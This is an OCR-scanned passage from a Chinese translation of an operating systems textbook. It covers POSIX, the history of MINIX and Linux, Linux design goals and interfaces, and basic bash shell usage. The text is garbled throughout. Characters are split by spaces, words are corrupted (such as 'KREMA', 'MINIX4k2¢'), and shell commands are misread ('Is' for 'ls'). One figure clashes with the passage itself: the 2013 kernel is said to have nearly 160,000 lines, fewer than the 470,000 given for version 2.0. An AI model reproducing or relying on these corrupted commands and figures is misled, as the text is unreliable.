的 确 大 多 数 标 准 制定 机 构 都 会 做 出 令 人 厌恶 的 妥协 ， 在 标准 中 包含 一 些 制 定 这 个 标准 的 机 构 偏好 的 
一 些 特性 。 在 这 点 上 ，1003.1 做 得 非常 好 ， 它 考虑 到 了 制定 时 牵涉 到 的 大 量 相关 者 与 他 们 各 自 既 定 喜好 。 
IEEE 委 员 会 并 没有 采用 System V 与 BSD 特 性 的 并 集 作 为 标准 的 起 始点 (大 部 分 的 标准 组 织 常 这 样 做 )， 
而 是 采用 了 两 者 的 交集 。 简 而 言 之 ， 如 果 一 个 特性 在 System V 与 BSD 中 都 出 现 了 ， 它 就 被 包含 在 标准 中 ， 
否则 就 被 排除 出 去 。 由 于 这 种 做 法 ，1003.1 与 System V 和 BSD 两 者 的 共同 祖先 UNIX 第 7 版 有 着 很 强 的 相 
似 性 。1003.1 文 档 的 编写 方式 使 得 操作 系统 的 开发 者 与 软件 的 开发 者 都 能 够 理解 ， 这 是 它 在 标准 界 中 的 
另 一 个 创新 之 处 ， 即 使 这 方面 的 改进 工作 已 经 在 进行 之 中 。 

虽然 1003.1 标 准 只 解决 了 系统 调用 的 问题 ， 但 是 一 些 相关 文档 对 线程 、 应 用 程序 、 网 络 及 UNIX 的 
其 他 特性 进行 了 标准 化 。 另 外 ，ANSI 与 ISO 组 织 也 对 C 语 言 进 行 了 标准 化 。 

10.1.6 MINIX 

所 有 现代 的 UNIX 系 统 共 有 的 一 个 特点 是 它们 又 大 又 复杂 。 在 这 点 上 ， 与 UNIX 的 初 囊 背 道 而 驰 。 即 使 
源 代码 可 以 免费 得 到 (在 大 多 数 情况 下 并 不 是 这 样 )， 单 纯 一 个 人 不 再 能 够 理解 整个 系统 。 这 种 情况 导致 
本 书 的 一 位 作者 (Andrew S. Tanenbaum) 编写 了 一 个 新 的 类 UNIX 系 统 ， 它 足够 小 ， 因 而 比较 容易 理解 。 
它 的 所 有 源 代码 公开 ， 可 以 用 作 教 学 目的 。 这 个 系统 由 11 800 行 C 代 码 以 及 800 行 汇编 代码 构成 。 它 于 1987 
年 发 布 ， 在 功能 上 与 UNIX 第 7 版 几乎 相同 ， 后 者 是 PDP-11 时 代 大 多 数 计算 机 科学 系 的 中 流 古 柱 。 

MINIX 属 于 最 早 的 一 批 基于 微 内 核 设 计 的 类 UNIX 系 统 。 微 内 核 背后 的 思想 是 在 内 核 中 只 提供 最 少 
的 功能 ， 从 而 使 其 可 靠 和 高 效 。 因 此 ， 内 存 管理 和 文件 系统 被 作为 用 户 进程 实现 。 内 核 只 负责 进程 间 的 
信息 传递 。 内 核 包 含 1600 行 C 代码 以 及 800 行 汇编 代码 。 由 于 与 8088 体 系 结构 相关 的 技术 原因 ，LO 设 备 
驱动 (增加 2900 行 C 代码 ) 也 在 内 核 中 。 文 件 系统 (5100 行 C 代 码 ) 与 内 存 管 理 (2200 行 C 代 码 ) 作为 
两 个 独立 的 用 户 进程 运行 。 

由 于 高 度 模块 化 的 结构 ， 微 内 核 相 对 于 单 核 系统 有 着 易于 理解 和 维护 的 优点 。 同 时 ， 由 于 一 个 用 户 
态 进 程 崩溃 后 造成 的 损害 要 远 小 于 一 个 内 核 组 件 崩溃 后 造成 的 损害 ， 因 此 将 功能 代码 从 内 核 移 到 用 户 态 
后 ， 系 统 会 更 加 可 靠 。 微 内 核 的 主要 缺点 是 用 户 态 与 内 核 态 的 额外 切换 会 带 来 较 大 的 性 能 损失 。 然 而 ， 
性 能 并 不 代表 一 切 : 所 有 现代 的 UNIX 系 统 为 获得 更 好 的 模块 性 在 用 户 态 运行 X-windows， 同 时 容忍 其 
带 来 的 性 能 损失 〈 与 此 相反 的 是 Windows， 其 GUI 运行 在 内 核 中 ) 。 在 那个 时 代 ， 其 他 的 著名 微 内 核 设 
计 包 括 Mach (Accetta 等 人 ，1986) 和 Chorus (Rozier 等 人 ，1988 ) 。 

MINIX 在 问世 几 个 月 之 内 ， 就 在 自己 的 USENET (现在 的 Google) 新 闻 组 comp.os.minix 以 及 
40 000 多 名 使 用 者 中 风靡 一 时 。 大 量 使 用 者 提供 了 命令 和 其 他 用 户 程序 ， 所 以 MINIX 迅 速 地 变 成 了 一 个 
由 互联 网 上 的 众多 使 用 者 完成 的 集体 项 目 。 它 是 之 后 出 现 的 其 他 集体 项 目的 一 个 原型 。1997 年 ，MINIX 
第 2 版 发 布 ， 其 基本 系统 包含 了 网 络 ， 并 且 代 码 量 增长 到 了 62 200 行 。 

2004 年 左右 ，MINIX 的 发 展 方向 发 生 了 巨大 的 变化 ， 它 专注 于 发 展 一 个 极其 可 靠 、 可 依赖 的 系统 ， 
能 够 自动 修复 自身 错误 并 且 自 恢复 ， 即 使 在 可 重复 软件 缺陷 被 触发 的 情况 下 也 能 够 继续 正常 工作 。 因 此 ， 
第 1 版 中 的 模块 化 思想 在 MINIX 3.0 中 得 到 极 大 扩展 ， 几 乎 所 有 的 设备 驱动 被 移 到 了 用 户 空间 ， 每 一 个 驱 
动作 为 独立 的 进程 运行 。 整 个 核心 的 大 小 突然 降 到 不 到 4000 行 代码 ， 因 此 一 个 单独 的 程序 员 可 以 轻易 地 
理解 。 为 了 增强 容错 能 力 ， 系 统 的 内 部 机 制 在 很 多 地 方 发 生 了 改变 。 

另外 , 有 超过 650 种 流行 的 UNIX 程 序 被 移植 到 MINIX 3.0, 包括 X Window 系 统 (有 了 时候 只 用 X 表 示 )、 
各 种 各 样 的 编译 器 (包括 gcc)、 文 本 处 理 软 件 、 网 络 软件 、 浏 览 器 以 及 其 他 很 多 程序 。 与 以 前 的 版 本 在 
本 质 上 主要 是 教学 用 途 不 同 ， 从 MINIX 3.0 开 始 拥 有 高 可 用 性 ， 并 聚焦 在 高 可 靠 性 上 。MINIX 的 最 终 目 
标 是 : 取消 复位 键 。 

《操作 系统 设计 与 实现 》 (Operating Systems; Design and Implementation) 这 本 书 的 第 三 版 中 介绍 
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了 这 个 新 系统 ， 在 附录 中 还 有 源 代码 和 详细 介绍 (Tanenbaum 和 Woodhull, 2006), MINIX4k2¢ & ke, 
并 有 着 一 个 活跃 的 用 户 群 体 。 因 为 该 系统 已 经 被 移植 到 ARM 处 理 器 中 ， 所 以 它 可 运用 于 嵌入 式 系统 。 
如 果 需 要 更 多 细节 或 免费 获取 最 新 版 本 ， 请 访问 www.minix3.org。 

10.1.7 Linux 

在 互联 网 上 讨论 MINIX 发 展 的 早期 阶段 时 ， 很 多 人 请 求 (在 很 多 情况 下 是 要 求 ) 添加 更 多 更 好 的 特 
性 。 对 于 这 些 请 求 ， 作 者 通常 说 “不 ” (为 使 系统 足够 小 ， 使 学 生 在 一 个 学 期 的 大 学 课程 中 就 能 完全 理 
解 ) 。 持 续 的 拒绝 使 很 多 使 用 者 感到 厌倦 。 但 当时 还 没有 FreeBSD ， 因 此 这 些 用 户 没 有 其 他 选择 。 这 样 
的 情况 过 了 很 多 年 ， 直 到 一 位 芬兰 学 生 Linus Torvalds 决 定编 写 另 外 一 个 类 UNIX 系 统 ， 称 为 Linux。 
Linux 将 会 是 一 个 完备 的 系统 产品 ， 拥 有 许多 MINIX 一 开始 缺乏 的 特性 。Linux 的 第 1 个 版 本 0.01 在 1991 
年 发 布 。 它 在 一 台 运 行 MINIX 的 机 器 上 交叉 开发 ， 从 MINIX 借 用 了 从 源码 树 结 构 到 文件 系统 设计 的 很 多 
思想 。 然 而 它 是 一 种 整体 式 设 计 ， 将 整个 操作 系统 包含 在 内 核 之 中 ， 而 非 MINIX 那 样 的 微 内 核 设计 。 
Linux0.01 版 本 共有 9300 行 C 代 码 和 950 行 汇编 代码 ， 大 致 上 与 MINIX 版 本 大 小 接近 ， 功 能 也 差不多 。 事 
实 上 ，Linux 就 是 Torvalds 对 MINIX 的 一 次 重 写 ， 当 时 ， 他 也 只 能 得 到 MINIX 系 统 的 源 代码 了 。 

当 加 入 了 虚拟 内 存 这 样 一 个 更 加 复杂 的 文件 系统 以 及 更 多 的 特征 之 后 ，Linux 的 大 小 急速 增长 ， 并 
且 演 化 成 了 一 个 完整 的 UNIX 克 隆 产品 。 虽 然 ， 在 刚 开始 ，Linux 只 能 运行 在 386 机 器 上 (甚至 把 386 汇 编 
代码 做 入 到 了 C 程 序 中 间 )， 但 是 很 快 就 被 移植 到 了 其 他 平台 上 ， 并 且 现 在 像 UNIX 一 样 ， 能 够 运行 在 各 
种 类 型 的 机 器 上 。 尽 管 如 此 ，Linux 和 UNIX 之 间 还 是 有 一 个 很 明显 的 不 同 : Linux 利 用 了 gcc 编 译 器 的 很 
多 特性 ， 需 要 做 大 量 的 工作 ， 才 能 使 Linux 能 够 被 ANSI 标 准 C 编 译 器 编译 。 有 一 种 想法 认为 gcc 编 译 器 将 
是 世界 上 仅 有 的 编译 器 ， 这 是 非常 短视 的 ， 因 为 来 自 伊利 诺 伊 大 学 的 开源 LLVM 编 译 器 正 凭借 它 的 灵活 
性 和 代码 质量 迅速 获得 众多 的 追随 者 。LLVM 并 不 支持 所 有 非 标准 C 的 gcc 扩 展 ， 在 缺少 用 来 取代 非 ANSI 
代码 的 大 量 补丁 的 情况 下 ，LLVM 无 法 编译 Linux 内 核 。 

接 下 来 的 一 个 主要 的 Linux 发 行 版 是 1994 年 发 布 的 版 本 1.0。 它 大 概 有 165 000 行 代码 ， 并 且 包 含 了 一 
个 新 的 文件 系统 、 内 存 映 射 文件 和 可 以 与 BSD 相 容 的 带 有 大 , 接 字 和 TCP/IP 的 网 络 。 它 同时 也 包含 了 一 些 
新 的 驱动 程序 。 在 接 下 来 的 两 年 中 ， 发 布 了 几 个 轻 量 修订 版 本 。 

到 这 个 时 候 ，Linux 已 经 和 UNIX 充 分 兼容 ， 大 量 的 UNIX 软 件 都 被 移植 到 了 Linux 上， 使 得 它 比 起 以 
前 具有 了 更 强 的 可 用 性 。 另 外 ， 大 量 的 用 户 被 Linux 所 吸引 ， 并 且 在 Torvalds 的 整体 管理 下 开始 用 多 种 方 
法 对 Linux 的 代码 进行 研究 和 扩展 。 

之 后 一 个 主要 的 发 行 版 是 1996 年 发 布 的 2.0 版 本 。 它 由 大 约 470 000 行 C 代 码 和 8000 行 汇编 代码 组 成 。 
它 包 含 了 对 64 位 体系 结构 的 支持 、 对 称 多 道 程序 设计 、 新 的 网 络 协议 和 许多 的 其 他 特性 。 一 个 为 支持 不 
断 增 多 的 外 部 设备 而 编写 的 可 扩展 设备 驱动 程序 集 ， 占 用 了 总 代码 量 的 很 大 一 部 分 。 随 后 ， 很 快 发 行 了 
另外 的 版 本 。 

Linux 内 核 的 版 本 号 由 四 个 数字 组 成 ，A.B.C.D， 如 2.6.9.11。 第 一 个 数字 表示 内 核 的 版 本 。 第 二 个 
数字 表示 第 几 个 主要 修订 版 。 在 2.6 版 本 内 核 之 前 ， 偶 数 版 本 号 相当 于 内 核 的 稳定 发 行 版 ， 而 奇数 版 本 
号 则 相当 于 不 稳定 的 修订 版 ， 即 开发 版 。 在 2.6 版 本 内 核 中 ， 不 再 是 这 种 情况 了 。 第 三 个 数字 表示 次 要 
修订 版 ， 比 如 支持 了 新 的 驱动 程序 等 。 第 四 个 数字 则 与 小 的 错误 修正 或 安全 补丁 相关 。2011 年 7 月 ， 
Linus Torvalds 宣 布 了 Linux 3.0 的 发 布 ， 目 的 不 是 为 了 响应 重大 的 技术 进步 ， 而 是 为 了 纪念 内 核发 布 20 周 
年 。 截 至 2013 年 ，Linux 内 核 代码 已 接近 16 万 行 。 

大 量 的 标准 UNIX 软 件 移 植 到 了 Linux 上 ， 包 括 X 窗 口 系 统 和 大 量 的 网 络 软 件 。 也 有 人 为 Linux 开 发 
了 两 个 不 同 的 GUI (GNOME 和 KDE)， 二 者 有 相互 竞争 之 势 。 简 而 言 之 ，Linux 已 经 成 长 为 一 个 完整 的 
UNIX 翻 版 ， 包 括 了 UNIX 爱 好 者 可 能 想到 的 所 有 特性 。 

Linux 的 一 个 特征 就 是 它 的 商业 模式 : 它 是 自由 软件 。 它 可 以 从 互联 网 上 的 很 多 站 点 中 下 载 到 ， 比 
4n: www.kernel.org。Linux 带 有 一 个 由 自由 软件 基金 会 (FSF) 的 创建 者 Richard Stallman 设 计 的 许可 。 
尽管 Linux 是 自由 的 ， 但 是 它 的 这 个 许可 GPL (GNU 公 共 许 可 )， 比 微软 Windows 的 许可 更 长 ， 并 且 规 定 
了 用 户 能 够 使 用 代码 做 什么 以 及 不 能 做 什么 。 用 户 可 以 自由 地 使 用 、 复 制 、 修 改 以 及 传播 源 代码 和 二 进 
制 代码 。 主 要 的 限制 是 以 Linux 内 核 为 基础 开发 的 产品 不 能 只 以 二 进 制 形式 (可 执行 文件 ) 出 售 或 分 
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R: 其 源 代码 必须 要 么 与 产品 一 起 发 送 ， 要 么 可 以 随意 索取 。 

虽然 Torvalds 仍 然 相 当 紧 密 地 控制 着 Linux 的 内 核 ， 但 是 Linux 的 大 量 用 户 级 程序 是 由 其 他 程序 员 编 
写 的 。 他 们 中 的 很 多 人 一 开始 是 从 MINIX、BSD 或 GNU 在 线 社区 转移 过 来 的 。 然 而 ， 随 着 Linux 的 发 展 ， 
越 来 越 少 的 Linux 社 区 成 员 想 要 修改 源 代 码 (有 上 百 本 介绍 怎样 安装 和 使 用 Linux 的 书 ， 然 而 只 有 少数 书 
介绍 源 代码 以 及 其 工作 机 理 )。 同 时 ,很 多 Linux 用 户 放 弃 了 互联 网 上 免费 分 发 的 版 本 ， 转 而 购买 众多 竞 
争 商业 公司 提供 的 CD-ROM 版 本 。 在 一 个 流行 站 点 www.distrowatch.org 上 列 出 了 现在 最 流行 的 100 种 
Linux 版 本 。 随 着 越 来 越 多 的 软件 公司 开始 销售 自制 版 本 的 Linux， 而 且 越 来 越 多 的 硬件 公司 承诺 在 他 们 
出 售 的 计算 机 上 预 装 Linux， 自 由 软件 与 商业 软件 之 间 的 界限 变 得 愈 发 模糊 了 。 

作为 Linux 故 事 的 一 个 有 趣 的 脚注 ， 我 们 注意 到 在 Linux 变 得 越 来 越 流 行 时 ， 它 从 一 个 意 想不到 的 源 
头 (AT&T) 获得 了 很 大 的 推动 。1992 年 ， 由 于 缺乏 资金 ，Berkeley 决 定 在 推出 BSD 的 最 终 版 本 4.4BSD 
后 停止 开发 〈4.4BSD 后 来 成 为 FreeBSD 的 基础 ) 。 由 于 这 个 版 本 几乎 不 包含 AT&T 的 代码 ，Berkeley 决 定 
将 这 个 软件 的 开源 许可 证 (不 是 GPL) 发 布 ， 任 何人 可 以 对 它 做 任何 想 做 的 事情 ， 只 要 不 对 加 州 大 学 提 
出 诉讼 。AT&T 负 责 UNIX 的 子 公司 做 出 了 迅速 的 反应 一 一 正如 你 猜 的 那样 一 一 它 提出 了 对 加 州 大 学 的 诉 
讼 。 同 时 ， 它 也 控告 了 BSDI， 一 家 由 BSD 开 发 者 创立 、 包 装 系统 并 出 售 服务 的 公司 ( 正 像 Red Hat 以 及 
其 他 公司 现在 为 Linux 所 做 的 那样 ) 。 由 于 4.4BSD 中 事实 上 不 含有 AT&T 的 代码 ， 起 诉 是 依据 版 权 和 商标 
侵犯 ， 包 括 BSDI 的 1-800-ITS-UNIX 那 样 的 电话 号 码 。 虽 然 这 次 诉讼 最 终 在 庭 外 和 解 ， 它 把 FreeBSD 隔 
离 在 市 场 之 外 ， 却 给 了 Linux 足 够 的 时 间 发 展 壮大 。 如 果 这 次 诉讼 没有 发 生 ， 从 1993 年 起 两 个 免费 、 开 
源 的 UNIX 系 统 之 间 就 会 进行 激烈 的 竞争 : 由 处 于 统治 地 位 的 、 成 熟 稳定 且 自 1977 年 起 就 在 学 界 得 到 巨 
大 支持 的 系统 BSD 应 对 富有 活力 的 年 轻 挑 战 者 、 只 有 两 年 历史 却 在 个 人 用 户 中 支持 率 稳步 增长 的 Linux。 
谁 知 道 这 场 免费 UNICES 的 战争 会 变 成 何 种 局 面 ? 


10.2 Linux 简 介 


为 了 那些 对 Linux 不 熟悉 的 用 户 的 利益 ， 在 这 一 节 我 们 将 对 Linux 本 身 以 及 如 何 使 用 Linux 进 行 简单 
的 介绍 。 几 乎 本 节 介 绍 的 所 有 内 容 同样 适用 于 所 有 与 UNIX 相 差不多 的 UNIX 衍 生 系统 。 虽 然 Linux 有 多 
种 图 形 界面 ， 但 在 这 里 我 们 关注 的 是 在 X 系 统 的 shell 窗 口中 工作 的 程序 员 眼 中 的 Linux 界 面 。 在 随后 的 几 
节 中 ， 我 们 将 关注 系统 调用 以 及 它们 是 如 何在 内 核 中 工作 的 。 


10.2.1 Linux 的 设计 目标 

一 直 以 来 ，UNIX 都 被 设计 成 一 种 能 够 同时 处 理 多 进程 和 多 用 户 的 交互 式 系统 。 它 是 由 程序 员 设计 
的 ， 也 是 给 程序 员 使 用 的 ， 而 使 用 它 的 用 户 大 多 都 比较 有 经 验 并 且 经 常 参与 (通常 较为 复杂 的 ) 软件 开 
发 项 目 。 在 很 多 情况 下 ， 通 常 是 大 量 的 程序 员 通过 积极 的 合作 来 开发 一 个 单一 的 系统 ， 因 此 UNIX 有 广 
泛 的 工具 来 支持 在 可 控制 的 条 件 下 的 多 人 合作 和 信息 共享 。 一 组 有 经 验 的 程序 员 共 同 开发 一 个 复杂 软件 
的 模式 显然 和 一 个 初学 者 独立 地 使 用 一 个 文档 编辑 器 的 个 人 计算 机 模式 有 显著 区 别 ， 而 这 种 区 别 在 
UNIX 系 统 中 自始至终 都 有 所 反映 。Linux 系 统 自然 而 然 地 继承 了 这 些 设计 目标 ， 尽管 它 的 第 一 个 版 本 是 
面向 个 人 电脑 的 。 

好 的 程序 员 追 求 什么 样 的 系统 ? 首先， 大 多 数 程序 员 喜 欢 让 系统 尽量 简单 , 优雅, 并 且 具 有 一 致 性 。 
比如 ， 从 最 底层 的 角度 来 讲 ， 一 个 文件 应 该 只 是 一 个 字 节 集合 。 为 了 实现 顺序 存 取 、 随 机 存 取 :按键 存 
取 、 远 程 存 取 等 而 设计 不 同类 型 的 文件 〈 像 大 型 机 一 样 ) 只 会 碍 事 。 类 似 地 ， 如 果 命 令 

Is A* 


的 意思 是 列举 出 所 有 以 “A” 打 头 的 文件 ， 那 么 命令 


rm A* 


的 意思 就 应 该 是 删除 所 有 以 “A” 打 头 的 文件 而 不 是 删除 文件 名 是 “A*” 的 那个 文件 。 这 个 特性 有 时 被 
称 为 最 小 惊讶 原理 。 

有 经 验 的 程序 员 通 常 还 希望 系统 具有 较 强 的 功能 性 和 灵活 性 。 这 意味 着 一 个 系统 应 该 具有 较 小 的 一 
组 基本 元 素 ， 而 这 些 元 素 可 有 多 种 多 样 的 组 合 方式 来 满足 各 种 应 用 需要 。 设 计 Linux 的 一 个 基本 指导 方 
针 就 是 每 个 程序 应 该 只 做 一 件 事 并 且 把 它 做 好 。 因 此 ， 编 译 器 不 会 产生 列表 ， 因 为 有 其 他 的 程序 可 以 更 
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好 地 实现 这 个 功能 。 

最 后 ， 大 多 数 程 序 员 非 常 反 感 没 用 的 元 余 。 如 果 cp 可 以 胜任 ， 那 么 为 什么 还 需要 copy? 这 完全 是 浪 
费 宝贵 的 骇 客 时 间 。 为 了 从 文件 f 中 提取 所 有 包含 字符 串 “ard” 的 行 ，Linux 程 序 员 输入 

grep ard f 


另外 一 种 方法 是 让 程序 员 先 选择 grep 程 序 (不 带 参数 ) ， 然 后 让 grep 程 序 自己 宣布 说 “你 好 ， 我 是 grep， 
我 在 文件 中 寻找 模式 。 请 输入 你 要 寻找 的 模式 。” 在 输入 一 个 模式 之 后 ，grep 程 序 要 求 输入 一 个 文件 名 。 
然后 它 再 提问 是 否 还 有 别 的 文件 。 最 后 ， 它 总 结 需要 执行 的 任务 并 且 询 问 是 否 正确 。 尽 管 这 样 的 用 户 界 
面 可 能 适合 初学 者 ， 但 它 会 把 有 经 验 的 程序 员 逼 疯 。 他 们 想 要 的 是 一 个 佣 人 ， 不 是 一 个 保姆 。 
10.2.2 到 Linux 的 接口 

一 个 Linux 系 统 可 被 看 成 一 座 金字 塔 ， 如 图 10-1 所 示 。 最 底层 的 是 硬件 ， 包 括 CPU、 内 存 、 磁 盘 、 
显示 器 、 键 盘 以 及 其 他 设备 。 运 行 在 硬件 之 上 的 是 操作 系统 。 它 的 作用 是 控制 硬件 并 且 为 其 他 程序 提供 
系统 调用 接口 。 这 些 系统 调用 允许 用 户 程序 创立 并 管理 进程 、 文 件 以 及 其 他 资源 。 


标准 实用 程序 
(shell、 编 辑 器 、 编 译 器 等 ) 


标准 库 函 数 


(open、close、read、write、fork 等 ) 












| 


用 户 态 








Linux 操 作 系 统 
(进程 管理 、 存 储 管理 、 文 件 系统 、I/O 等 ) 


硬件 
(CPU、 内 存 、 磁 盘 、 终 端 等 ) 


图 10-1 Linux 系 统 中 的 层次 结构 


程序 通过 把 参数 放 入 寄存 器 (有 时 是 栈 ) 来 调用 系统 调用 ， 并 发 出 陷入 指令 从 用 户 模式 切换 到 内 核 模 
式 。 由 于 不 能 用 C 语 言 写 一 条 陷入 指令 ， 因 此 系统 提供 了 一 个 库 ， 每 个 函数 对 应 一 个 系统 调用 。 这 些 函数 
是 用 汇编 语言 写 的 ， 不 过 可 以 从 C 中 调用 。 每 一 个 函数 首先 将 参数 放 到 合适 的 地 方 ， 然 后 执行 陷阱 命令 。 
因此 , 为 了 执行 read 系 统 调用 ,一 个 C 程 序 需要 调用 read 库 函数 。 值 得 一 提 的 是 ， 由 POSIX 指 定 的 是 库 接口 ， 
而 不 是 系统 调用 接口 。 换 句 话说 ，POSIX 规 定 哪些 库 函 数 是 一 个 符合 标准 规范 的 系统 必须 提供 的 ， 它 们 的 
参数 是 什么 ， 它 们 的 功能 是 什么 ， 以 及 它们 返回 什么 样 的 结果 。POSIX 根 本 没有 提 到 真正 的 系统 调用 。 

除了 操作 系统 和 系统 调用 库 ， 所 有 版 本 的 Linux 必 须 提供 大 量 的 标准 程序 ， 其 中 一 些 是 由 POSIX 
1003.2 标 准 指定 的 ， 其 他 的 根据 不 同 版 本 的 Linux 而 有 所 不 同 。 它 们 包括 命令 处 理 器 (shell)、 编 译 器 、 
编辑 器 、 文 本 处 理 程序 以 及 文件 操作 工具 。 用 户 使 用 键盘 调用 的 是 上 述 这 些 程序 。 因 此 ， 我 们 可 以 说 
Linux 具 有 三 种 不 同 的 接口 : 真正 的 系统 调用 接口 、 库 函数 接口 和 由 标准 应 用 程序 构成 的 接口 。 

大 多 数 常见 的 Linux 个 人 计算 机 发 行 版 都 把 上 述 的 面向 键盘 的 用 户 界面 替换 为 面向 鼠标 的 图 形 用 户 
界面 ， 而 根本 没有 修改 操作 系统 本 身 。 正 是 这 种 灵活 性 让 Linux 如 此 流行 并 且 在 经 历 了 如 此 多 的 技术 革 
新 后 存活 下 来 。 

Linux 的 GUI 和 最 初 在 20 世 纪 70 年 代为 UNIX 系 统 开发 的 、 后 来 由 于 Macintosh 和 Windows 变 得 流行 的 
GUI 非 常 相似 。 这 种 GUI 创 建 一 个 桌面 环境 ， 包 括 窗 口 、 图 标 、 文 件 夹 、 工 具 栏 和 拖 搜 功 能 。 一 个 完整 的 
桌面 环境 包含 一 个 窗口 管理 器 (负责 控制 窗口 的 摆 放 和 外 观 ) ， 以 及 各 种 应 用 程序 ， 并 且 提 供 一 个 一 致 的 
图 形 界面 。 比 较 流行 的 Linux 桌 面 环境 包括 GNOME (GNU 网 络 对 象 模型 环境 ) 和 KDE (KREMA). 

Linux 上 的 GUI 由 X 窗 口 系统 (常常 称 为 X11 或 者 X) 所 支持 ， 它 负责 定义 用 于 UNIX 和 类 UNIX 系 统 
中 基于 位 图 显示 的 操作 窗口 的 通信 和 显示 协议 。 其 主要 组 成 部 分 X 服 务 器 ， 控 制 键盘 、 鼠 标 、 显 示 器 等 
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设备 ， 并 负责 输入 重 定向 或 者 从 客户 程序 接受 输出 。 实 际 的 GUI 环境 通常 构建 在 一 个 包含 与 X 服 务 器 进 
行 交 互 功能 的 低层 库 xlib 上 。 图 形 界面 将 X11 的 基本 功能 进行 拓展 ， 丰 富 了 窗口 的 显示 ， 提 供 按 钮 、 菜 
单 、 图 标 以 及 其 他 选项 。X 服 务 器 可 以 通过 命令 行 手动 启动 ， 不 过 通常 在 启动 过 程 中 由 一 个 负责 显示 用 
户 登 录 图 形 界面 的 显示 管理 器 启动 。 

当 在 Linux 上 使 用 图 形 界面 时 ， 用 户 可 以 通过 鼠标 点 击 运行 程序 或 者 打开 文件 ， 通 过 拖拉 将 文件 从 
一 个 地 方 复制 到 另 一 个 地 方 等 。 另 外 ， 用 户 也 可 以 启动 一 个 终端 模拟 程序 xterm， 它 为 用 户 提供 一 个 到 
操作 系统 的 基本 命令 行 界 面 。 下 面 一 节 有 关于 它 的 详细 描述 。 

10.2.3 shell 

尽管 Linux 系 统 具 有 图 形 用 户 界面 ， 然 而 大 多 数 程序 员 和 高 级 用 户 都 更 愿意 使 用 一 个 命令 行 界面 ， 
称 作 shell。 通 常 这 些 用 户 在 图 形 用 户 界面 中 启动 一 个 或 更 多 的 shell 窗 口 ， 然 后 就 在 这 些 shell 窗 口中 工作 。 
shell 命 令 行 界面 使 用 起 来 更 快速 ， 功 能 更 强大 ， 扩 展 性 更 好 ， 并 且 让 用 户 不 会 遭受 由 于 必须 一 直 使 用 鼠 
标 而 引起 的 肢体 重复 性 劳损 (RSI) 。 接 下 来 我 们 简要 介绍 一 下 bash shell (bash)。 它 基于 的 是 UNIX 最 原 
始 的 shell (Bourne shell) ( 先 由 Steve Bourne 编 写 ， 后 来 由 贝尔 实验 室 开 发 ) ， 它 的 名 字 也 是 Bourne 
Again shell 的 首 字母 缩写 。 经 常 使 用 的 还 有 很 多 其 他 的 shell (ksh 和 csh 等 ) ， 但 是 bash 是 大 多 数 Linux 系 
统 的 默认 shell。 

当 Sshell 被 启动 时 ， 它 初始 化 自己 ， 然 后 在 屏幕 上 输出 一 个 提示 符 (prompt)， 通常 是 一 个 百 分 号 或 
者 美元 符号 ， 并 等 待 用 户 输入 命令 行 。 

等 用 户 输入 一 个 命令 行 后 ，shell 提 取 其 中 的 第 一 个 字 ， 这 里 的 字 指 的 是 被 空格 或 制 表 符 分 隔 开 的 一 
连 串 字符 。 假 定 这 个 字 是 将 要 运行 程序 的 程序 名 ， 搜 索 这 个 程序 ， 如 果 找 到 了 这 个 程序 就 运行 它 。 然 后 ， 
shell 会 将 自己 挂 起 直到 该 程序 运行 完毕 ， 之 后 再 尝试 读 入 下 一 条 命令 。 重 要 的 是 ，shell 也 只 是 一 个 普通 
用 户 程序 。 它 仅仅 需要 从 键盘 读 取 数 据 、 向 显示 器 输出 数据 和 运行 其 他 程序 的 能 力 。 

命令 中 还 可 以 包含 参数 ， 它 们 作为 字符 串 传 给 所 调用 的 程序 。 比 如 ， 下 面 的 命令 行 


cp src dest 


调用 cp 程序 并 包含 两 个 参数 src 和 dest。 这 个 程序 将 第 一 个 参数 解释 为 一 个 现存 的 文件 名 ， 然 后 创建 该 文 
件 的 一 个 副本 ， 其 名 称 为 dest。 

并 不 是 所 有 的 参数 都 是 文件 名 。 在 命令 行 

head -20 file 


中 ， 第 一 个 参数 -20 通 知 head 程 序 输出 file 中 的 前 20 行 ， 而 不 是 默认 的 10 行 。 负 责 控制 一 个 命令 的 操作 或 
” 者 指定 一 个 可 选 数值 的 参数 称 为 标志 (flag) ， 习 惯 上 由 一 个 破 折 号 标记 。 为 了 避免 歧义 ， 这 个 破 折 号 是 
必要 的 ， 比 如 
head 20 file 
是 一 个 完全 合法 的 命令 ， 它 告诉 head 程 序 输出 文件 名 为 20 的 文件 的 前 10 行 ， 然 后 输出 文件 名 为 file 的 文 
件 的 前 10 行 。 大 多 数 Linux 命 令 接 受 多 个 标志 和 多 个 参数 。 
为 了 更 容易 地 指定 多 个 文件 名 ，shell 支 持 魔法 字符 ， 有 时 称 为 通配符 。 比 如 ， 一 个 星 号 可 以 匹配 所 
有 可 能 的 字符 串 ， 因 此 
Is*.c 
告诉 ls 列举 出 所 有 文件 名 以 .c 结 束 的 文件 。 如 果 同 时 存在 文件 xc、yc 和 z.c， 那 么 上 述 命令 等 价 于 下 面 的 命令 
Is X.c y.c Z.C 
另 一 个 通配符 是 问号 ， 负 责 匹 配 任意 一 个 字符 。 一 组 在 中 括号 中 的 字符 可 以 表示 其 中 的 任意 一 个 ， 因 此 
Is [ape]* 
IHAL “a” “p” 或 者 “e” 开 头 的 文件 。 
像 shell 这 样 的 程序 不 一 定 非 要 通过 终端 (键盘 和 显示 器 ) 进行 输入 输出 。 当 它 (或 者 任何 其 他 程序 ) 
启动 时 ， 它 自动 获得 了 对 标准 输入 (负责 正常 输入 ) ， 标 准 输出 〈 负 责 正常 输出 ) 和 标准 错误 (负责 输 
出 错误 信息 ) 文件 进行 访问 的 能 力 。 正 常情 况 下 ， 上 述 三 个 文件 默认 地 都 指向 终端 ， 因 此 标准 的 输出 是 


w= eee 


实例 研 穹 1: UNIX, Linux#eAndroid 41] 


从 键盘 输入 的 ， 而 标准 输出 或 者 标准 错误 是 输出 到 显示 器 的 。 许 多 Linux 程 序 默认 从 标准 输入 进行 输入 
并 从 标准 输出 进行 输出 。 比 如 


sort 


调用 sort 程 序 ， 其 从 终端 读 取 数 据 (直到 用 户 输入 Ctrl-D 表 示 文 件 结束 )， 根 据 字母 顺序 将 它们 排序 ， 然 
后 将 结果 输出 到 屏幕 上 。 

也 可 以 对 标准 输入 和 输出 进行 重 定 向 ， 因 为 这 种 情况 通常 会 很 有 用 。 对 标准 输入 进行 重 定 向 的 语法 
使 用 一 个 小 于 号 (<) 加 上 紧 接 的 一 个 输入 文件 名 。 类 似 的 ， 标 准 输出 可 以 通过 一 个 大 于 号 (>) 进行 重 
